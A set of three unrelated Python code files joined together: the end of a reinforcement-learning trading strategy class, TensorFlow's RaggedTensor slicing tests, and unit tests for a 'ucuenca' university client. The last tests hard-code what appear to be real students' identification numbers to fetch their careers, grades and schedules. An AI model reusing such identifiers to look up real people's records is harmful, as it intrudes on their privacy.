super(RLIntStrategy, self).__init__(policy, outer_trade_decision, level_infra, common_infra, **kwargs)
self.policy = policy
self.state_interpreter = init_instance_by_config(state_interpreter, accept_types=StateInterpreter)
self.action_interpreter = init_instance_by_config(action_interpreter, accept_types=ActionInterpreter)
def generate_trade_decision(self, execute_result=None):
_interpret_state = self.state_interpreter.interpret(execute_result=execute_result)
_action = self.policy.step(_interpret_state)
_trade_decision = self.action_interpreter.interpret(action=_action)
return _trade_decision
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for third_party.tensorflow.python.ops.ragged_tensor."""
import re
from absl.testing import parameterized
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged.ragged_tensor import RaggedTensor
from tensorflow.python.platform import googletest
class _SliceBuilder:
"""Helper to construct arguments for __getitem__.
Usage: _SliceBuilder()[<expr>] slice_spec Python generates for <expr>.
"""
def __getitem__(self, slice_spec):
return slice_spec
SLICE_BUILDER = _SliceBuilder()
def _make_tensor_slice_spec(slice_spec, use_constant=True):
"""Wraps all integers in an extended slice spec w/ a tensor.
This function is used to help test slicing when the slice spec contains
tensors, rather than integers.
Args:
slice_spec: The extended slice spec.
use_constant: If true, then wrap each integer with a tf.constant. If false,
then wrap each integer with a tf.placeholder.
Returns:
A copy of slice_spec, but with each integer i replaced with tf.constant(i).
"""
def make_piece_scalar(piece):
if isinstance(piece, int):
scalar = constant_op.constant(piece)
if use_constant:
return scalar
else:
return array_ops.placeholder_with_default(scalar, [])
elif isinstance(piece, slice):
return slice(
make_piece_scalar(piece.start), make_piece_scalar(piece.stop),
make_piece_scalar(piece.step))
else:
return piece
if isinstance(slice_spec, tuple):
return tuple(make_piece_scalar(piece) for piece in slice_spec)
else:
return make_piece_scalar(slice_spec)
# Example 2D ragged tensor value with one ragged dimension and with scalar
# values, expressed as nested python lists and as splits+values.
EXAMPLE_RAGGED_TENSOR_2D = [[b'a', b'b'], [b'c', b'd', b'e'], [b'f'], [],
[b'g']]
EXAMPLE_RAGGED_TENSOR_2D_SPLITS = [0, 2, 5, 6, 6, 7]
EXAMPLE_RAGGED_TENSOR_2D_VALUES = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
# Example 4D ragged tensor value, with two ragged dimensions and with values
# whose shape is [2], expressed as nested python lists and as splits+values.
EXAMPLE_RAGGED_TENSOR_4D = [
[ # rt[0]
[[1, 2], [3, 4], [5, 6]], # rt[0][0]
[[7, 8], [9, 10], [11, 12]]], # rt[0][1]
[], # rt[1]
[ # rt[2]
[[13, 14], [15, 16], [17, 18]]], # rt[2][0]
[ # rt[3]
[[19, 20]]] # rt[3][0]
] # pyformat: disable
EXAMPLE_RAGGED_TENSOR_4D_SPLITS1 = [0, 2, 2, 3, 4]
EXAMPLE_RAGGED_TENSOR_4D_SPLITS2 = [0, 3, 6, 9, 10]
EXAMPLE_RAGGED_TENSOR_4D_VALUES = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18],
[19, 20]]
# Example 3D ragged tensor with uniform_row_lengths.
EXAMPLE_RAGGED_TENSOR_3D = [[[1, 2, 3], [4], [5, 6]], [[], [7, 8, 9], []]]
EXAMPLE_RAGGED_TENSOR_3D_ROWLEN = 3
EXAMPLE_RAGGED_TENSOR_3D_SPLITS = [0, 3, 4, 6, 6, 9, 9]
EXAMPLE_RAGGED_TENSOR_3D_VALUES = [1, 2, 3, 4, 5, 6, 7, 8, 9]
@test_util.run_all_in_graph_and_eager_modes
class RaggedGetItemTest(test_util.TensorFlowTestCase, parameterized.TestCase):
longMessage = True # Property in unittest.Testcase. pylint: disable=invalid-name
#=============================================================================
# RaggedTensor.__getitem__
#=============================================================================
def _TestGetItem(self, rt, slice_spec, expected, expected_shape=None):
"""Helper function for testing RaggedTensor.__getitem__.
Checks that calling `rt.__getitem__(slice_spec) returns the expected value.
Checks three different configurations for each slice spec:
* Call __getitem__ with the slice spec as-is (with int values)
* Call __getitem__ with int values in the slice spec wrapped in
`tf.constant()`.
* Call __getitem__ with int values in the slice spec wrapped in
`tf.compat.v1.placeholder()` (so value is not known at graph
construction time).
Args:
rt: The RaggedTensor to test.
slice_spec: The slice spec.
expected: The expected value of rt.__getitem__(slice_spec), as a python
list; or an exception class.
expected_shape: The expected shape for `rt.__getitem__(slice_spec)`.
"""
tensor_slice_spec1 = _make_tensor_slice_spec(slice_spec, True)
tensor_slice_spec2 = _make_tensor_slice_spec(slice_spec, False)
value1 = rt.__getitem__(slice_spec)
value2 = rt.__getitem__(tensor_slice_spec1)
value3 = rt.__getitem__(tensor_slice_spec2)
self.assertAllEqual(value1, expected, 'slice_spec=%s' % (slice_spec,))
self.assertAllEqual(value2, expected, 'slice_spec=%s' % (slice_spec,))
self.assertAllEqual(value3, expected, 'slice_spec=%s' % (slice_spec,))
if expected_shape is not None:
value1.shape.assert_is_compatible_with(expected_shape)
value2.shape.assert_is_compatible_with(expected_shape)
value3.shape.assert_is_compatible_with(expected_shape)
def _TestGetItemException(self, rt, slice_spec, expected, message):
"""Helper function for testing RaggedTensor.__getitem__ exceptions."""
tensor_slice_spec = _make_tensor_slice_spec(slice_spec, True)
with self.assertRaisesRegex(expected, message):
self.evaluate(rt.__getitem__(slice_spec))
with self.assertRaisesRegex(expected, message):
self.evaluate(rt.__getitem__(tensor_slice_spec))
@parameterized.parameters(
# Tests for rt[i]
(SLICE_BUILDER[-5], EXAMPLE_RAGGED_TENSOR_2D[-5]),
(SLICE_BUILDER[-4], EXAMPLE_RAGGED_TENSOR_2D[-4]),
(SLICE_BUILDER[-1], EXAMPLE_RAGGED_TENSOR_2D[-1]),
(SLICE_BUILDER[0], EXAMPLE_RAGGED_TENSOR_2D[0]),
(SLICE_BUILDER[1], EXAMPLE_RAGGED_TENSOR_2D[1]),
(SLICE_BUILDER[4], EXAMPLE_RAGGED_TENSOR_2D[4]),
# Tests for rt[i:]
(SLICE_BUILDER[-6:], EXAMPLE_RAGGED_TENSOR_2D[-6:]),
(SLICE_BUILDER[-3:], EXAMPLE_RAGGED_TENSOR_2D[-3:]),
(SLICE_BUILDER[-1:], EXAMPLE_RAGGED_TENSOR_2D[-1:]),
(SLICE_BUILDER[0:], EXAMPLE_RAGGED_TENSOR_2D[0:]),
(SLICE_BUILDER[3:], EXAMPLE_RAGGED_TENSOR_2D[3:]),
(SLICE_BUILDER[5:], EXAMPLE_RAGGED_TENSOR_2D[5:]),
# Tests for rt[:j]
(SLICE_BUILDER[:-6], EXAMPLE_RAGGED_TENSOR_2D[:-6]),
(SLICE_BUILDER[:-3], EXAMPLE_RAGGED_TENSOR_2D[:-3]),
(SLICE_BUILDER[:-1], EXAMPLE_RAGGED_TENSOR_2D[:-1]),
(SLICE_BUILDER[:0], EXAMPLE_RAGGED_TENSOR_2D[:0]),
(SLICE_BUILDER[:3], EXAMPLE_RAGGED_TENSOR_2D[:3]),
(SLICE_BUILDER[:5], EXAMPLE_RAGGED_TENSOR_2D[:5]),
# Tests for rt[i:j]
(SLICE_BUILDER[0:3], EXAMPLE_RAGGED_TENSOR_2D[0:3]),
(SLICE_BUILDER[3:5], EXAMPLE_RAGGED_TENSOR_2D[3:5]),
(SLICE_BUILDER[-5:3], EXAMPLE_RAGGED_TENSOR_2D[-5:3]),
(SLICE_BUILDER[3:1], EXAMPLE_RAGGED_TENSOR_2D[3:1]),
(SLICE_BUILDER[-1:1], EXAMPLE_RAGGED_TENSOR_2D[-1:1]),
(SLICE_BUILDER[1:-1], EXAMPLE_RAGGED_TENSOR_2D[1:-1]),
# Tests for rt[i, j]
(SLICE_BUILDER[0, 1], EXAMPLE_RAGGED_TENSOR_2D[0][1]),
(SLICE_BUILDER[1, 2], EXAMPLE_RAGGED_TENSOR_2D[1][2]),
(SLICE_BUILDER[-1, 0], EXAMPLE_RAGGED_TENSOR_2D[-1][0]),
(SLICE_BUILDER[-3, 0], EXAMPLE_RAGGED_TENSOR_2D[-3][0]),
(SLICE_BUILDER[:], EXAMPLE_RAGGED_TENSOR_2D),
(SLICE_BUILDER[:, :], EXAMPLE_RAGGED_TENSOR_2D),
# Empty slice spec.
([], EXAMPLE_RAGGED_TENSOR_2D),
# Test for ellipsis
(SLICE_BUILDER[...], EXAMPLE_RAGGED_TENSOR_2D),
(SLICE_BUILDER[2, ...], EXAMPLE_RAGGED_TENSOR_2D[2]),
(SLICE_BUILDER[..., :], EXAMPLE_RAGGED_TENSOR_2D),
(SLICE_BUILDER[..., 2, 0], EXAMPLE_RAGGED_TENSOR_2D[2][0]),
(SLICE_BUILDER[2, ..., 0], EXAMPLE_RAGGED_TENSOR_2D[2][0]),
(SLICE_BUILDER[2, 0, ...], EXAMPLE_RAGGED_TENSOR_2D[2][0]),
# Test for array_ops.newaxis
(SLICE_BUILDER[array_ops.newaxis, :], [EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, array_ops.newaxis],
[[row] for row in EXAMPLE_RAGGED_TENSOR_2D]),
# Slicing inner ragged dimensions.
(SLICE_BUILDER[-1:,
1:4], [row[1:4] for row in EXAMPLE_RAGGED_TENSOR_2D[-1:]]),
(SLICE_BUILDER[:, 1:4], [row[1:4] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, -2:], [row[-2:] for row in EXAMPLE_RAGGED_TENSOR_2D]),
# Strided slices
(SLICE_BUILDER[::2], EXAMPLE_RAGGED_TENSOR_2D[::2]),
(SLICE_BUILDER[::-1], EXAMPLE_RAGGED_TENSOR_2D[::-1]),
(SLICE_BUILDER[::-2], EXAMPLE_RAGGED_TENSOR_2D[::-2]),
(SLICE_BUILDER[::-3], EXAMPLE_RAGGED_TENSOR_2D[::-3]),
(SLICE_BUILDER[:, ::2], [row[::2] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, ::-1], [row[::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, ::-2], [row[::-2] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, ::-3], [row[::-3] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, 2::-1],
[row[2::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, -1::-1],
[row[-1::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[..., -1::-1],
[row[-1::-1] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[:, 2::-2],
[row[2::-2] for row in EXAMPLE_RAGGED_TENSOR_2D]),
(SLICE_BUILDER[::-1, ::-1],
[row[::-1] for row in EXAMPLE_RAGGED_TENSOR_2D[::-1]]),
) # pyformat: disable
def testWithRaggedRank1(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
# Ragged tensor
rt = RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_2D_VALUES,
EXAMPLE_RAGGED_TENSOR_2D_SPLITS)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_2D)
self._TestGetItem(rt, slice_spec, expected)
# pylint: disable=g-complex-comprehension
@parameterized.parameters([(start, stop)
for start in [-2, -1, None, 0, 1, 2]
for stop in [-2, -1, None, 0, 1, 2]])
def testWithStridedSlices(self, start, stop):
test_value = [[1, 2, 3, 4, 5], [6, 7], [8, 9, 10], [], [9],
[1, 2, 3, 4, 5, 6, 7, 8]]
rt = ragged_factory_ops.constant(test_value)
for step in [-3, -2, -1, 1, 2, 3]:
# Slice outer dimension
self.assertAllEqual(rt[start:stop:step], test_value[start:stop:step],
'slice=%s:%s:%s' % (start, stop, step))
# Slice inner dimension
self.assertAllEqual(rt[:, start:stop:step],
[row[start:stop:step] for row in test_value],
'slice=%s:%s:%s' % (start, stop, step))
# pylint: disable=invalid-slice-index
@parameterized.parameters(
# Tests for out-of-bound errors
(SLICE_BUILDER[5], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[-6], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[0, 2], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
(SLICE_BUILDER[3, 0], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
# Indexing into an inner ragged dimension
(SLICE_BUILDER[:, 3], ValueError,
'Cannot index into an inner ragged dimension'),
(SLICE_BUILDER[:1, 3], ValueError,
'Cannot index into an inner ragged dimension'),
(SLICE_BUILDER[..., 3], ValueError,
'Cannot index into an inner ragged dimension'),
# Tests for type errors
(SLICE_BUILDER[0.5], TypeError, re.escape(array_ops._SLICE_TYPE_ERROR)),
(SLICE_BUILDER[1:3:0.5], TypeError, re.escape(
array_ops._SLICE_TYPE_ERROR)),
(SLICE_BUILDER[:, 1:3:0.5], TypeError,
'slice strides must be integers or None'),
(SLICE_BUILDER[:, 0.5:1.5], TypeError,
'slice offsets must be integers or None'),
(SLICE_BUILDER['foo'], TypeError, re.escape(array_ops._SLICE_TYPE_ERROR)),
(SLICE_BUILDER[:, 'foo':'foo'], TypeError,
'slice offsets must be integers or None'),
# Tests for other errors
(SLICE_BUILDER[..., 0, 0,
0], IndexError, 'Too many indices for RaggedTensor'),
)
def testErrorsWithRaggedRank1(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
# Ragged tensor
rt = RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_2D_VALUES,
EXAMPLE_RAGGED_TENSOR_2D_SPLITS)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_2D)
self._TestGetItemException(rt, slice_spec, expected, message)
@parameterized.parameters(
# Tests for rt[index, index, ...]
(SLICE_BUILDER[2, 0], EXAMPLE_RAGGED_TENSOR_4D[2][0]),
(SLICE_BUILDER[2, 0, 1], EXAMPLE_RAGGED_TENSOR_4D[2][0][1]),
(SLICE_BUILDER[2, 0, 1, 1], EXAMPLE_RAGGED_TENSOR_4D[2][0][1][1]),
(SLICE_BUILDER[2, 0, 1:], EXAMPLE_RAGGED_TENSOR_4D[2][0][1:]),
(SLICE_BUILDER[2, 0, 1:, 1:], [[16], [18]]),
(SLICE_BUILDER[2, 0, :, 1], [14, 16, 18]),
(SLICE_BUILDER[2, 0, 1, :], EXAMPLE_RAGGED_TENSOR_4D[2][0][1]),
# Tests for rt[index, slice, ...]
(SLICE_BUILDER[0, :], EXAMPLE_RAGGED_TENSOR_4D[0]),
(SLICE_BUILDER[1, :], EXAMPLE_RAGGED_TENSOR_4D[1]),
(SLICE_BUILDER[0, :, :, 1], [[2, 4, 6], [8, 10, 12]]),
(SLICE_BUILDER[1, :, :, 1], []),
(SLICE_BUILDER[2, :, :, 1], [[14, 16, 18]]),
(SLICE_BUILDER[3, :, :, 1], [[20]]),
# Tests for rt[slice, slice, ...]
(SLICE_BUILDER[:, :], EXAMPLE_RAGGED_TENSOR_4D),
(SLICE_BUILDER[:, :, :, 1], [[[2, 4, 6], [8, 10, 12]], [], [[14, 16, 18]],
[[20]]]),
(SLICE_BUILDER[1:, :, :, 1], [[], [[14, 16, 18]], [[20]]]),
(SLICE_BUILDER[-3:, :, :, 1], [[], [[14, 16, 18]], [[20]]]),
# Test for ellipsis
(SLICE_BUILDER[...], EXAMPLE_RAGGED_TENSOR_4D),
(SLICE_BUILDER[2, ...], EXAMPLE_RAGGED_TENSOR_4D[2]),
(SLICE_BUILDER[2, 0, ...], EXAMPLE_RAGGED_TENSOR_4D[2][0]),
(SLICE_BUILDER[..., 0], [[[1, 3, 5], [7, 9, 11]], [], [[13, 15, 17]],
[[19]]]),
(SLICE_BUILDER[2, ..., 0], [[13, 15, 17]]),
(SLICE_BUILDER[2, 0, ..., 0], [13, 15, 17]),
# Test for array_ops.newaxis
(SLICE_BUILDER[array_ops.newaxis, :], [EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, array_ops.newaxis],
[[row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
# Empty slice spec.
([], EXAMPLE_RAGGED_TENSOR_4D),
# Slicing inner ragged dimensions.
(SLICE_BUILDER[:, 1:4], [row[1:4] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, -2:], [row[-2:] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, :-1],
[[v[:-1] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, 1:2],
[[v[1:2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[1:, 1:3, 1:2],
[[v[1:2] for v in row[1:3]] for row in EXAMPLE_RAGGED_TENSOR_4D[1:]]),
# Strided slices
(SLICE_BUILDER[::2], EXAMPLE_RAGGED_TENSOR_4D[::2]),
(SLICE_BUILDER[::-1], EXAMPLE_RAGGED_TENSOR_4D[::-1]),
(SLICE_BUILDER[::-2], EXAMPLE_RAGGED_TENSOR_4D[::-2]),
(SLICE_BUILDER[1::2], EXAMPLE_RAGGED_TENSOR_4D[1::2]),
(SLICE_BUILDER[:, ::2], [row[::2] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, 1::2], [row[1::2] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, ::2],
[[v[::2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, 1::2],
[[v[1::2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, ::-1],
[[v[::-1] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[:, :, ::-2],
[[v[::-2] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[..., ::-1, :],
[[v[::-1] for v in row] for row in EXAMPLE_RAGGED_TENSOR_4D]),
(SLICE_BUILDER[..., ::-1], [[[v[::-1] for v in col] for col in row]
for row in EXAMPLE_RAGGED_TENSOR_4D]),
) # pyformat: disable
def testWithRaggedRank2(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_nested_row_splits(
EXAMPLE_RAGGED_TENSOR_4D_VALUES,
[EXAMPLE_RAGGED_TENSOR_4D_SPLITS1, EXAMPLE_RAGGED_TENSOR_4D_SPLITS2])
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_4D)
self._TestGetItem(rt, slice_spec, expected)
@parameterized.parameters(
# Test for errors in unsupported cases
(SLICE_BUILDER[:, 0], ValueError,
'Cannot index into an inner ragged dimension.'),
(SLICE_BUILDER[:, :, 0], ValueError,
'Cannot index into an inner ragged dimension.'),
# Test for out-of-bounds errors.
(SLICE_BUILDER[1, 0], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
(SLICE_BUILDER[0, 0, 3],
(IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
(SLICE_BUILDER[5], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[0, 5], (IndexError, ValueError,
errors.InvalidArgumentError), '.*out of bounds.*'),
)
def testErrorsWithRaggedRank2(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_nested_row_splits(
EXAMPLE_RAGGED_TENSOR_4D_VALUES,
[EXAMPLE_RAGGED_TENSOR_4D_SPLITS1, EXAMPLE_RAGGED_TENSOR_4D_SPLITS2])
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_4D)
self._TestGetItemException(rt, slice_spec, expected, message)
@parameterized.parameters(
(SLICE_BUILDER[:], []),
(SLICE_BUILDER[2:], []),
(SLICE_BUILDER[:-3], []),
)
def testWithEmptyTensor(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_row_splits([], [0])
self._TestGetItem(rt, slice_spec, expected)
@parameterized.parameters(
(SLICE_BUILDER[0], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
(SLICE_BUILDER[-1], (IndexError, ValueError, errors.InvalidArgumentError),
'.*out of bounds.*'),
)
def testErrorsWithEmptyTensor(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_row_splits([], [0])
self._TestGetItemException(rt, slice_spec, expected, message)
@parameterized.parameters(
(SLICE_BUILDER[-4], EXAMPLE_RAGGED_TENSOR_2D[-4]),
(SLICE_BUILDER[0], EXAMPLE_RAGGED_TENSOR_2D[0]),
(SLICE_BUILDER[-3:], EXAMPLE_RAGGED_TENSOR_2D[-3:]),
(SLICE_BUILDER[:3], EXAMPLE_RAGGED_TENSOR_2D[:3]),
(SLICE_BUILDER[3:5], EXAMPLE_RAGGED_TENSOR_2D[3:5]),
(SLICE_BUILDER[0, 1], EXAMPLE_RAGGED_TENSOR_2D[0][1]),
(SLICE_BUILDER[-3, 0], EXAMPLE_RAGGED_TENSOR_2D[-3][0]),
)
def testWithPlaceholderShapes(self, slice_spec, expected):
"""Test that rt.__getitem__(slice_spec) == expected."""
# Intentionally use an unknown shape for `splits`, to force the code path
# that deals with having nrows unknown at graph construction time.
splits = constant_op.constant(
EXAMPLE_RAGGED_TENSOR_2D_SPLITS, dtype=dtypes.int64)
splits = array_ops.placeholder_with_default(splits, None)
rt = RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_2D_VALUES, splits)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_2D)
self._TestGetItem(rt, slice_spec, expected)
@parameterized.parameters(
(SLICE_BUILDER[..., 2], ValueError,
'Ellipsis not supported for unknown shape RaggedTensors'),)
def testErrorsWithPlaceholderShapes(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
if not context.executing_eagerly():
# Intentionally use an unknown shape for `values`.
values = array_ops.placeholder_with_default([0], None)
rt = RaggedTensor.from_row_splits(values, [0, 1])
self._TestGetItemException(rt, slice_spec, expected, message)
def testNewAxis(self):
# rt: [[[['a', 'b'], ['c', 'd']], [], [['e', 'f']]], []]
splits1 = [0, 3, 3]
splits2 = [0, 2, 2, 3]
values = constant_op.constant([['a', 'b'], ['c', 'd'], ['e', 'f']])
rt = RaggedTensor.from_nested_row_splits(values, [splits1, splits2])
rt_newaxis0 = rt[array_ops.newaxis]
rt_newaxis1 = rt[:, array_ops.newaxis]
rt_newaxis2 = rt[:, :, array_ops.newaxis]
rt_newaxis3 = rt[:, :, :, array_ops.newaxis]
rt_newaxis4 = rt[:, :, :, :, array_ops.newaxis]
self.assertAllEqual(
rt, [[[[b'a', b'b'], [b'c', b'd']], [], [[b'e', b'f']]], []])
self.assertAllEqual(
rt_newaxis0, [[[[[b'a', b'b'], [b'c', b'd']], [], [[b'e', b'f']]], []]])
self.assertAllEqual(
rt_newaxis1,
[[[[[b'a', b'b'], [b'c', b'd']], [], [[b'e', b'f']]]], [[]]])
self.assertAllEqual(
rt_newaxis2,
[[[[[b'a', b'b'], [b'c', b'd']]], [[]], [[[b'e', b'f']]]], []])
self.assertAllEqual(
rt_newaxis3,
[[[[[b'a', b'b']], [[b'c', b'd']]], [], [[[b'e', b'f']]]], []])
self.assertAllEqual(
rt_newaxis4,
[[[[[b'a'], [b'b']], [[b'c'], [b'd']]], [], [[[b'e'], [b'f']]]], []])
self.assertEqual(rt.ragged_rank, 2)
self.assertEqual(rt_newaxis0.ragged_rank, 3)
self.assertEqual(rt_newaxis1.ragged_rank, 3)
self.assertEqual(rt_newaxis2.ragged_rank, 3)
self.assertEqual(rt_newaxis3.ragged_rank, 2)
self.assertEqual(rt_newaxis4.ragged_rank, 2)
self.assertEqual(rt_newaxis0.shape.as_list(), [1, 2, None, None, 2])
self.assertEqual(rt_newaxis1.shape.as_list(), [2, 1, None, None, 2])
self.assertEqual(rt_newaxis2.shape.as_list(), [2, None, 1, None, 2])
self.assertEqual(rt_newaxis3.shape.as_list(), [2, None, None, 1, 2])
self.assertEqual(rt_newaxis4.shape.as_list(), [2, None, None, 2, 1])
@parameterized.parameters(
# EXAMPLE_RAGGED_TENSOR_3D.shape = [2, 3, None]
# Indexing into uniform_row_splits dimension:
(SLICE_BUILDER[:, 1], [r[1] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[:, 2], [r[2] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[:, -2], [r[-2] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[:, -3], [r[-3] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[1:, 2], [r[2] for r in EXAMPLE_RAGGED_TENSOR_3D[1:]],
[1, None]),
(SLICE_BUILDER[:, 1, 1:], [r[1][1:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, None]),
(SLICE_BUILDER[1:, 1, 1:],
[r[1][1:] for r in EXAMPLE_RAGGED_TENSOR_3D[1:]],
[1, None]),
# Slicing uniform_row_splits dimension:
(SLICE_BUILDER[:, 2:], [r[2:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 1, None]),
(SLICE_BUILDER[:, -2:], [r[-2:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 2, None]),
(SLICE_BUILDER[:, :, 1:],
[[c[1:] for c in r] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 3, None]),
(SLICE_BUILDER[:, 5:], [r[5:] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 0, None]),
# Slicing uniform_row_splits dimension with a non-default step size:
(SLICE_BUILDER[:, ::2], [r[::2] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 2, None]),
(SLICE_BUILDER[:, ::-1], [r[::-1] for r in EXAMPLE_RAGGED_TENSOR_3D],
[2, 3, None]),
) # pyformat: disable
def testWithUniformRowLength(self, slice_spec, expected, expected_shape):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_uniform_row_length(
RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_3D_VALUES,
EXAMPLE_RAGGED_TENSOR_3D_SPLITS),
EXAMPLE_RAGGED_TENSOR_3D_ROWLEN)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_3D)
self.assertIsNot(rt.uniform_row_length, None)
self._TestGetItem(rt, slice_spec, expected, expected_shape)
# If the result is 3D, then check that it still has a uniform row length:
actual = rt.__getitem__(slice_spec) # pylint: disable=assignment-from-no-return
if actual.shape.rank == 3:
self.assertIsNot(actual.uniform_row_length, None)
self.assertAllEqual(actual.uniform_row_length, expected_shape[1])
@parameterized.parameters(
(SLICE_BUILDER[:, 3], errors.InvalidArgumentError, 'out of bounds'),
(SLICE_BUILDER[:, -4], errors.InvalidArgumentError, 'out of bounds'),
(SLICE_BUILDER[:, 10], errors.InvalidArgumentError, 'out of bounds'),
(SLICE_BUILDER[:, -10], errors.InvalidArgumentError, 'out of bounds'),
)
def testErrorsWithUniformRowLength(self, slice_spec, expected, message):
"""Test that rt.__getitem__(slice_spec) == expected."""
rt = RaggedTensor.from_uniform_row_length(
RaggedTensor.from_row_splits(EXAMPLE_RAGGED_TENSOR_3D_VALUES,
EXAMPLE_RAGGED_TENSOR_3D_SPLITS),
EXAMPLE_RAGGED_TENSOR_3D_ROWLEN)
self.assertAllEqual(rt, EXAMPLE_RAGGED_TENSOR_3D)
self._TestGetItemException(rt, slice_spec, expected, message)
if __name__ == '__main__':
googletest.main()
|
import unittest
import json
import os
from ucuenca.ucuenca import Ucuenca
TEST_RESOURCES = os.path.join(
os.path.dirname(__file__),
"..", "tests_resources"
)
class GetCareersTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_careers(self):
"""Check 0104926787's careers."""
student_id = '0104926787'
expected_result = self._get_careers()
actual_result = self.ucuenca.careers(student_id)
self.assertEqual(expected_result, actual_result)
def test_careers_invalid_student(self):
"""Check invalid student's careers."""
student_id = '1234567890'
result = self.ucuenca.careers(student_id)
self.assertFalse(result)
def _get_careers(self):
path = os.path.join(TEST_RESOURCES, "careers.json")
with open(path) as f:
json_file = json.load(f)
return json_file
class GetNotesTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
@unittest.expectedFailure
def test_notes(self):
"""Check 0302068309's notes."""
student_id = '0302068309'
career_id = 16
perdiod_id = 115
expected_result = {} # TODO
actual_result = self.ucuenca.notes(student_id, career_id, perdiod_id)
self.assertEqual(actual_result, expected_result)
def test_notes_invalid_student(self):
"""Check invalid student's notes."""
student_id = '1234567890'
career_id = 34
perdiod_id = 115
result = self.ucuenca.notes(student_id, career_id, perdiod_id)
self.assertFalse(result)
class GetScheduleTests(unittest.TestCase):
def setUp(self):
self.ucuenca = Ucuenca()
def test_schedule(self):
"""Check 0104378690's schedule."""
student_id = '0104378690'
expected_result = self._get_schedule()
actual_result = self.ucuenca.schedule(student_id)
self.assertEqual(actual_result, expected_result)
